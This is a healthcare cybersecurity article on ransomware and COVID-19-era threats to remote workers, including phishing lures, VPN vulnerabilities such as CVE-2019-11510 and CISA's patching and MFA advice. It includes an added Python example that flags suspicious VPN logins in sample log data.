Ransomware gangs use a number of methods to gain access to healthcare networks and deploy ransomware. One is spam email that tricks healthcare employees into clicking malicious links that download ransomware or opening attachments that contain ransomware downloaders. Software vulnerabilities, particularly in Remote Desktop Protocol, are often exploited. Because many employees now access healthcare networks remotely through Virtual Private Networks (VPNs), ransomware gangs are also targeting VPN vulnerabilities. Several vulnerabilities were identified in VPN products over the past year, and although patches are available, they are often not applied.

Action Steps to Minimize Risk and Stop Ransomware Attacks

Make backups regularly so that files can be recovered when an attack occurs. However, backups alone do not guarantee that data can be restored. A number of threat groups conduct manual ransomware attacks and spend considerable time inside the network before deploying ransomware; in some cases the attackers also reach the backup systems and encrypt the backups as well.

RiskIQ recommends that healthcare providers store backups offline or on separate networks. Encrypting stored data is likewise essential. Data theft prior to ransomware deployment has been on the rise; when data is encrypted, the attackers cannot read it even if they steal it.

RiskIQ highlights the value of having an incident response plan, because it helps ensure that attacks are mitigated quickly to limit the damage. It is also very important to apply patches promptly.

During the COVID-19 crisis, make sure that all digital assets connecting to external organizations are monitored and secured, because attackers are actively looking for such devices.

It is also crucial to prepare the workforce and train employees to recognize threats such as phishing attacks. Phishing simulation exercises can help reduce susceptibility to ransomware attacks. IT teams must also stay current on attack trends, which change constantly.

Cybercriminals Targeting Remote Employees Throughout the COVID-19 Crisis

The COVID-19 outbreak has made it necessary for many people to self-quarantine, and organizations are under growing pressure to allow their workers to work from home where possible. Although these steps are needed to keep individuals safe and prevent infection, having large numbers of employees working remotely heightens cyber risk. When people work from home and connect to work networks remotely using portable devices, the attack surface grows substantially and new vulnerabilities are introduced that attackers can exploit. With attacks on remote workers increasing, it is essential to follow cybersecurity guidelines for securing remote workers in order to reduce risk.

Phishing Campaigns Aimed towards Remote Employees

Cybercriminals are currently taking advantage of the coronavirus crisis, using COVID-19 and coronavirus-themed lures in phishing and social engineering attacks to steal account credentials and spread malware. The first major coronavirus-themed phishing and malware distribution campaigns were detected at the start of January, and the volume of malicious emails has increased considerably in the weeks since. Phishing attacks are likely to increase further as cybercriminals attempt to steal remote access credentials and use them in weaponized email attacks that spread malware.

Campaigns aimed at remote employees have also been discovered recently. One such campaign notifies remote staff of positive COVID-19 tests within their company. The messages impersonate the employer and claim to contain information about emergency procedures that have been put in place, which remote employees are told to open, review and print out. Opening the attachment and enabling content triggers a malware download. Security researchers have also observed a rise in domains being used to deliver malware.

VPN Vulnerabilities Exploitation

In the past year, a number of critical vulnerabilities were discovered in the Virtual Private Network (VPN) solutions that remote employees use to connect securely to their company networks. Vulnerabilities were found in Pulse Connect Secure and Pulse Policy Secure gateways and in FortiGuard solutions. Although patches were issued to fix the vulnerabilities, many organizations did not apply them because the solutions were in use 24 hours a day. APT groups seized the opportunity and exploited the vulnerabilities to gain access to company networks. Now, with so many employees using VPNs and working from home, attacks are growing once more.

A large number of businesses are now using VPN services, teleconferencing tools and other remote access methods for the first time, and have had to deploy them quickly. Web and email services that were previously accessed only from inside the company have been reconfigured to permit external access, exposing those formerly internal services to the internet. The speed at which these changes were made to accommodate teleworking staff suggests that businesses were unable to review them fully and make sure that security was buttoned down.

CISA Warns of Exploitation of Vulnerabilities in VPNs and Campaigns Aimed Towards Remote Employees

To slow the spread of the coronavirus, many companies are allowing their employees to work from home. Although this measure is essential for lowering the risk of infection with Coronavirus Disease 2019 (COVID-19), working from home introduces other problems.

To defend against cyberattacks, remote connections to the network should be made through enterprise-class virtual private network (VPN) solutions. VPNs protect the connection between a user's device and the network, allowing healthcare data to be accessed and shared securely.

Although VPNs enhance security, many VPN solutions have vulnerabilities that cybercriminals can exploit. If those vulnerabilities are exploited, sensitive information may be intercepted, and an attacker may even take control of the affected systems. Cybercriminals are actively looking for VPN vulnerabilities to exploit, and the growing number of remote employees due to the coronavirus gives them even more potential victims.

The risks associated with VPNs and the growing number of remote employees due to the coronavirus have prompted the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) to issue an advisory urging companies to strengthen VPN security and follow cybersecurity controls to defend against cyberattacks.

A number of vulnerabilities were found in common VPN solutions in the past year, including VPN products from Palo Alto Networks, Pulse Secure and FortiGuard. Although patches were available to address the vulnerabilities, many companies did not update their software to the latest version. Failing to patch undermines the security the VPN is meant to provide.

In January 2020, a campaign was detected that exploited CVE-2019-11510, a remote code execution vulnerability in Pulse Connect Secure and Pulse Policy Secure, to deploy REvil ransomware. Exploiting the vulnerability could allow an attacker to access all active users and their credentials in plaintext, and to execute arbitrary commands on VPN clients when they connect to the server. Pulse Secure released a patch for the vulnerability on April 24, 2019, yet 9 months later many businesses were still running vulnerable VPN versions.

Updating VPNs can be difficult because they are generally in use 24 hours a day; nevertheless, it is important that updates are applied because of the high likelihood that unpatched vulnerabilities will be exploited. CISA is encouraging all businesses to prioritize VPN patches.

It is also essential to ensure that users can only access the systems they need to carry out their job tasks. Giving remote workers low-level privileges limits the damage that could be done if their credentials are compromised. IT teams should likewise step up monitoring of their systems and review access logs to identify possible compromises.

CISA has also warned about the growing number of phishing attacks targeting remote workers to obtain VPN credentials. Email security solutions are needed to catch these messages before they are delivered. Multifactor authentication should be implemented for remote access to prevent the use of compromised credentials. CISA cautions that businesses that do not implement MFA will be at higher risk from phishing attacks.
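The access-log review and VPN credential theft discussed above, as an added example that is not from the original article or from CISA: a small Python scan over constructed VPN authentication records (the log format, user names and IP addresses are all hypothetical) that flags two common signs of a guessed or phished VPN account, a run of failed logins that ends in a success, and successful logins from different source addresses within a short window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample VPN authentication log (hypothetical format, not from a real appliance).
SAMPLE_LOG = """\
2020-03-16T08:01:12 user=jsmith src=203.0.113.10 result=success
2020-03-16T08:02:03 user=adoe src=198.51.100.7 result=failure
2020-03-16T08:02:09 user=adoe src=198.51.100.7 result=failure
2020-03-16T08:02:15 user=adoe src=198.51.100.7 result=failure
2020-03-16T08:02:33 user=adoe src=198.51.100.7 result=success
2020-03-16T09:00:00 user=bwhite src=203.0.113.20 result=success
2020-03-16T09:10:30 user=bwhite src=192.0.2.55 result=success
2020-03-16T17:30:00 user=jsmith src=203.0.113.10 result=success
"""
LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>success|failure)$")

def parse_log(text):
    """Parse log lines into dicts with a datetime 'ts'; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.fromisoformat(rec["ts"])
            events.append(rec)
    return events

def detect_suspicious(events, fail_threshold=3, window=timedelta(minutes=30)):
    """Return {user: [alerts]}: (1) a run of failures that ends in a success,
    (2) consecutive successful logins from different source IPs within `window`."""
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)
    alerts = defaultdict(list)
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        fails = 0
        for e in evs:  # rule 1: guessing or spraying that finally succeeds
            if e["result"] == "success" and fails >= fail_threshold:
                alerts[user].append(f"{fails} failures then success from {e['src']}")
            fails = fails + 1 if e["result"] == "failure" else 0
        successes = [e for e in evs if e["result"] == "success"]
        for a, b in zip(successes, successes[1:]):  # rule 2: source IP changed quickly
            if b["src"] != a["src"] and b["ts"] - a["ts"] <= window:
                alerts[user].append(f"login from {a['src']} then {b['src']} within {window}")
    return dict(alerts)
```

Both rules are heuristics that need tuning to the organization's normal usage (travelling staff, mobile carriers that rotate addresses), and alerts should be confirmed against the MFA and help-desk records before an account is locked.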

IT teams must also ensure their systems can handle the increased number of remote staff. CISA warns that businesses may find they have only a limited number of VPN connections available, and if all of them are in use, some users will be unable to access the systems they need to telework.

The HHS' Centers for Medicare and Medicaid Services (CMS) has expanded Medicare telehealth benefits to help in the fight against COVID-19, and the HHS' Office for Civil Rights has announced that it will exercise enforcement discretion with regard to telehealth. This will allow more healthcare employees to work remotely in the coming weeks, making it all the more necessary that VPN guidelines are followed.